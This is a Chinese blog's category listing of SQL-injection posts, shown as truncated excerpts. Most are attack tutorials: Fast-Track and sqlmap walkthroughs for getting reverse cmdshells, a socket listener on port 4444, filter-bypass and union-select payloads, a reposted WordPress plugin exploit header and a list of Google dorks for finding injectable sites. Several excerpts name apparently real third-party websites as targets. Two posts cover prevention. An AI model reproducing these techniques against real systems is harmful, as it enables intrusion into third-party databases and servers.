SQL Injection
feier7501
这个作者很懒,什么都没留下…
展开
-
MSSQL2K - SQL Injector - Query String Parameter Attack获得反向cmdshell
上次没有成功获得cmdshell,因为fasttrack没有这方面的代码,这次编写了server.py。原来的博客链接:http://blog.csdn.net/feier7501/article/details/9220495import socketHOST = ''PORT = 4444s = socket.socket(socket.AF_INET, socket原创 2013-07-07 16:55:25 · 1587 阅读 · 0 评论 -
菜鸟学习SQL注射
http://www.2cto.com/Article/200606/10340.html一般国内的小一点的新闻站点程序 都有 ""&request 这种漏洞,下面我讲解攻击方法在地址栏:and 1=1查看漏洞是否存在,如果存在就正常返回该页,如果没有,则显示错误,继续假设这个站的数据库存在一个admin表在地址栏:and 0返回页正常,假设转载 2013-08-03 14:32:38 · 845 阅读 · 0 评论 -
sqlmap实例拿站
http://www.myhack58.com/Article/html/3/8/2012/35324.htm目标:http://www.djj.com/yz/cn/videodt.jsp?Videoid=10此URL为sa权限猪肉一块用穿山甲不能执行命令过程如下:通过访问http://www.djj .com/login.jsp得知该站由一转载 2013-08-03 14:46:12 · 21116 阅读 · 3 评论 -
菜鸟SQL注入详解
http://www.2cto.com/Article/200410/757.html利用SQL进行添加,更改,查看记录。 当一台主机台开了80端口,当你手头没有任何黑客工具,那么,偶们有SQL。 他不需要你其他东东,只要一个浏览器就够了。HOHO,偶的文章菜菜,偶写这 篇文章只是为了让一些对SQL很陌生的菜菜们看的,老鸟绕道。。。转载 2013-08-03 14:31:24 · 1080 阅读 · 0 评论 -
关于突破SQL注入限制的新思路
http://www.bitscn.com/network/protect/200804/139215.html突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好……转载 2013-08-04 15:40:12 · 1728 阅读 · 0 评论 -
突破sql 注入过滤Union+SELECT 继续射下去
http://www.myhack58.com/Article/html/3/7/2011/31053.htm 前几今天遇到一个bt 的老外注射点: //*ps 此点目前流行的注射工具射不 *// http://cleopatra-sy.com/index.php?content=more_product&id=17 http://cleopatr转载 2013-08-04 17:57:41 · 10990 阅读 · 2 评论 -
菜鸟也来学渗透——MySql暴库
http://www.2cto.com/Article/201305/212036.html暴库之前看看MySql这些版本的特性吧4.0以下不支持union查询4.0以上magic_quotes_gpc默认为on(magic_quotes_gpc=on当php.ini里的 magic_quotes_gpc 为On 时。提交的变量中所有的 ‘ (单引号), ” (双引转载 2013-08-04 14:10:31 · 3749 阅读 · 0 评论 -
mysql sql injection
Version:mysql> SELECT @@version;+------------------+| @@version |+------------------+| 5.0.96-community | +------------------+1 row in set (0.00 sec)Comments:mysql> SELECT 1; #com原创 2013-07-30 23:20:52 · 907 阅读 · 0 评论 -
WordPress ProPlayer Plugin 4.7.9.1 - SQL Injection
http://www.exploit-db.com/exploits/25605/############### Exploit Title : WordPress ProPlayer Plugin SQL Injection## Exploit Author : Ashiyane Digital Security Team## Plugin Link :转载 2013-08-11 23:03:17 · 1234 阅读 · 0 评论 -
mssql2000sp4 sql injection
Version:SELECT @@version;Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Evaluation Edition on Windows NT原创 2013-08-01 08:41:08 · 849 阅读 · 0 评论 -
Oracle sql injection
先创建一个普通用户并授权:C:\>sqlplus "/as sysdba"SQL*Plus: Release 10.2.0.1.0 - Production on 星期三 7月 31 21:49:45 2013Copyright (c) 1982, 2005, Oracle. All rights reserved.连接到:Personal Oracle Database 1原创 2013-07-31 22:52:58 · 1277 阅读 · 0 评论 -
MSSQL2K - SQL Injector - Query String Parameter Attack
操作如下:root@root:/pentest/exploits/fasttrack# ./fast-track.py -i****************************************************** Performing dependency checks... *******************************************原创 2013-07-01 23:11:52 · 1083 阅读 · 0 评论 -
MSSQL2K - SQL Injector - Query String Parameter Attack结合netcat获得反向cmdshell
fasttrack操作:root@bt:~# cd /pentest/exploits/fasttrack/root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i****************************************************** Performing dependency checks...原创 2013-07-08 20:23:10 · 1120 阅读 · 0 评论 -
SQL Injector - GET Manual Setup Binary Payload Attack
bt5上操作: ***************************************************************** ** ** ** Fast-Track - A new beginning...原创 2013-07-08 21:43:26 · 1009 阅读 · 0 评论 -
SQL Injector - POST Parameter Attack
login.jsp如下:<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>Register user username: password: bt5上操作如下:root@bt:/pentest/exploits/fasttrack原创 2013-07-08 21:32:47 · 1339 阅读 · 0 评论 -
(a)ttempt SQL Ping and Auto Quick Brute Force 续2——原因
今晚再次调试,发现生成的h2b.exe无法运行,这个文件用来把hex转换成bin,而且后面的代码,似乎也有问题: print "Metasploit payload delivered.." print "Converting our payload to binary, this may take a few..." query5=("""xp_c原创 2013-07-10 22:49:55 · 888 阅读 · 0 评论 -
How to Prevent SQL Injection Attack (Explained with an Example)
http://www.thegeekstuff.com/2012/02/sql-injection-attacks/This article explains basics of SQL Injection with an example that shows SQL Injection, and provides methods to prevent from these a转载 2013-06-22 22:53:18 · 1328 阅读 · 0 评论 -
SQL Injection Attacks by Example
http://www.unixwiz.net/techtips/sql-injection.htmlA customer asked that we check out his intranet site, which was used by the company's employees and customers. This was part of a larger sec转载 2013-06-24 09:06:42 · 1394 阅读 · 0 评论 -
SQL注入
数据库:mysql5.1login.jsp: username: password: LoginServlet: @Override protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { St原创 2013-06-26 21:05:41 · 739 阅读 · 0 评论 -
fasttrack的SQLPwnage(失败)
这次也是失败的,操作如下:root@bt:/pentest/exploits/fasttrack# ./fast-track.py -iFast-Track Main Menu: 1. Fast-Track Updates 2. Autopwn Automation 3. Nmap Scripting Engine 4. Microsoft SQL原创 2013-07-11 21:08:24 · 1014 阅读 · 0 评论 -
List of Google Dorks to find SQL Injection Vulnerability
http://www.greenhackerz.com/2012/03/more-than-600-dorks-to-find-sql.htmlinurl:index.php?id=inurl:trainers.php?id=inurl:buy.php?category=inurl:article.php?ID=inurl:lay_old.php?id=inur转载 2013-08-16 08:20:33 · 8825 阅读 · 0 评论